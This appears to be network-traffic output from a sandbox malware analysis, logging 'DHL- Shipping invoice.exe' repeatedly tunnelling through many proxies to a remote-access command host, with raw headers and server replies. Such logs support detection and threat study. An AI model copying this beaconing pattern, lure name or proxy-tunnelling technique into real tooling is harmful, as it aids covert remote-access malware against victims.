                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1537192.168.2.453978154.208.10.126806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.877361059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.941431999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.953428984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.246550083 CET309INHTTP/1.1 400 Bad Request
                            Server: nginx/1.23.1
                            Date: Tue, 12 Mar 2024 07:37:12 GMT
                            Content-Type: text/html
                            Content-Length: 157
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.1</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1538192.168.2.453877146.59.18.246498716484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.877779961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.062448025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.074337959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.062684059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:30.077933073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:42.249806881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1539192.168.2.44986094.23.220.136252566484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.878274918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.941423893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.953427076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:17.953260899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:30.046662092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:42.156177044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:54.156038046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:18.156011105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:06.234255075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1540192.168.2.454536156.67.217.159806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.878525972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.205349922 CET327INHTTP/1.1 400 Bad Request
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 166
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1541192.168.2.45388793.171.243.25310806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.879034996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1542192.168.2.45441658.20.21.23023236484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.879036903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1543192.168.2.454481203.95.196.580806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.883085966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1544192.168.2.453871159.223.71.71516166484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.883253098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1545192.168.2.454587170.84.205.1741536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.883820057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1546192.168.2.454626162.159.242.159806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.884243011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.971616983 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1547192.168.2.454503103.66.177.17322516484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.884952068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1548192.168.2.454611121.182.138.71806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.887595892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1549192.168.2.454631192.252.220.8941456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.892549038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1550192.168.2.454632147.75.34.86100106484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.892714977 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:06.061477900 CET65INHTTP/1.1 200 Connection Established
                            Proxy-Agent: Zscaler/6.3


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1551192.168.2.454575182.61.38.114826484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.905384064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.241241932 CET295INHTTP/1.1 400 Bad Request
                            Server: nginx
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 150
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1552192.168.2.452902194.4.50.132123346484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.909338951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1553192.168.2.44988966.228.37.252143216484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.909554005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.062438965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.074336052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.062697887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:30.078378916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:42.249794006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:54.252264977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:18.265402079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1554192.168.2.45462946.232.248.164806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.917146921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1555192.168.2.45462114.54.107.90806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.919234991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1556192.168.2.44988498.103.88.158461046484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.923058987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1557192.168.2.454686104.17.171.79806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.926311016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.013952971 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1558192.168.2.454624154.12.178.107299856484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.926878929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1559192.168.2.454694162.159.242.158806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.927333117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.015065908 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1560192.168.2.454696104.18.143.26806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.927639961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.015307903 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1561192.168.2.454693104.20.125.124806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.927841902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.015755892 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
